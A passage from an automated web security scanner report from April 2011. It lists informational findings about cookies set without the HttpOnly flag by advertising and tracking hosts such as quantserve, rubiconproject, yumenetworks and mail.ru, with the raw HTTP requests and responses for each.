Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303742441_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562769; uid=1_1303742441_1303179323923:6792170478871670; kwd=1_1303742441_11317:0_11717:0_11718:0_11719:0; sit=1_1303742441_719:0:0_2451:50869:45769_3236:208832:208714_782:563118:562769; cre=1_1303742441; bpd=1_1303742441; apd=1_1303742441; scg=1_1303742441; ppd=1_1303742441; afl=1_1303742441

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 14:41:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...

16.87. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=627389121;fpan=1;fpa=P0-962486039-1303741255035;ns=1;url=http%3A%2F%2Fgoods.adnectar.com%2Fstatic%2Fquantcast_1.html;ref=http%3A%2F%2Fwww.livejournal.com%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1303741255031;tzo=300;a=p-42U4PptTYmdC- HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://goods.adnectar.com/static/quantcast_1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EGUAFu8kjVmtjIMLyxuBATcBzAaBsQDe0kyka4WR_4JMMMhgggv-JgLbZ6Qw

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=1160808&id=736181&id=961753&id=688926&id=1160806&id=1057233&id=1127643&id=1206656&t=2
Set-Cookie: d=EEIAFu8kjVmtjIMLyxuBAVcBzAaBsQDe0kykaNQqOxjlwfsgkgy4F8MIOBvVeCCuOB_xAA6JIAEC22ekMA; expires=Sun, 24-Jul-2011 14:34:49 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 25 Apr 2011 14:34:49 GMT
Server: QS


16.88. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=2939|1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C2%2C%2C

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C; expires=Wed, 25-May-2011 14:54:28 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

16.89. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /dynamic_preroll_playlist.fmil

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=480&height=360&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:58 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA30AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:53:58 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21629
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_8AKTzxy2lLx8IW; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:53:58 GMT; Path=/
Content-Type: application/smil
Content-Length: 3099
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="480" height="360" ba
...[SNIP]...

16.90. http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif?replay_count=0&volume=100 HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; ymdt=0rO0ABXcSAAAEugAAA10AAQAAAOi7eGFI; ymvw=173_193_214_243_18R1PA3QCjJVp0

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:54:01 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_0_232
Set-Cookie: ymf=0rO0ABXcFAadrgwA*; Domain=.yumenetworks.com; Expires=Tue, 24-May-2011 14:54:01 GMT; Path=/
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
Location: http://ad.doubleclick.net/imp;v1;f;238884748;0-0;0;61850871;1|1;41734709|41752496|1;;cs=o;%3fhttp://ad.doubleclick.net/dot.gif?1303743241655
Content-Length: 0
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: image/gif


16.91. http://pogoda.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pogoda.webalta.ru
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: pogoda_reg=10290; expires=Tue, 24-Apr-2012 14:20:55 GMT; path=/; domain=.webalta.ru
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>............ ...
...[SNIP]...

16.92. http://pretty.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pretty.ru
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru
Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru
Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:24:33 GMT
Content-Length: 59765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8
...[SNIP]...

16.93. http://r2.mail.ru/b12179277.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179277.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179277.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:20:49 GMT
Content-Type: image/gif
Content-Length: 258
Connection: keep-alive
Set-Cookie: p=pPUGAEqlaAAA; expires=Wed, 24-Apr-13 14:20:49 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:20:49 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a..!...............................................................................................................................................................................................
...[SNIP]...

16.94. http://r2.mail.ru/b12179279.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179279.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179279.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 294
Connection: keep-alive
Set-Cookie: p=6ooGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a{.......................8..P.....I..$..A...............!.......,....{......0.I..8.....!.di.h..l.....tm.x..|..@.DA,....r.l:...BR.Z...v..z.... .....z.n....|>.$...~.........    .......................
...[SNIP]...

16.95. http://r2.mail.ru/b12179280.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12179280.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12179280.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/gif
Content-Length: 70
Connection: keep-alive
Set-Cookie: p=t9UGAE3BGQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a...................!.......,.............#....D-..,.i^'T....R..;

16.96. http://r2.mail.ru/b12201458.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12201458.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12201458.png HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:12 GMT
Content-Type: image/png
Content-Length: 1232
Connection: keep-alive
Set-Cookie: p=19oGAErbVQAA; expires=Wed, 24-Apr-13 14:21:12 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:12 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

.PNG
.
...IHDR............e.t.....tEXtSoftware.Adobe ImageReadyq.e<...diTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

16.97. http://r2.mail.ru/b12526055.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526055.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526055.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/gif
Content-Length: 122
Connection: keep-alive
Set-Cookie: p=nt4GAFHdKwAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...K.....\.r.J...J.y.8...............49.............n..3V.>..i.Z....k...m..2...;

16.98. http://r2.mail.ru/b12526056.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526056.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526056.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:15 GMT
Content-Type: image/jpeg
Content-Length: 3722
Connection: keep-alive
Set-Cookie: p=EuwGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:15 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:15 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.4..
...[SNIP]...

16.99. http://r2.mail.ru/b12526057.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526057.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526057.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2843
Connection: keep-alive
Set-Cookie: p=gNkGAEnndQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...

16.100. http://r2.mail.ru/b12526058.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526058.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526058.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
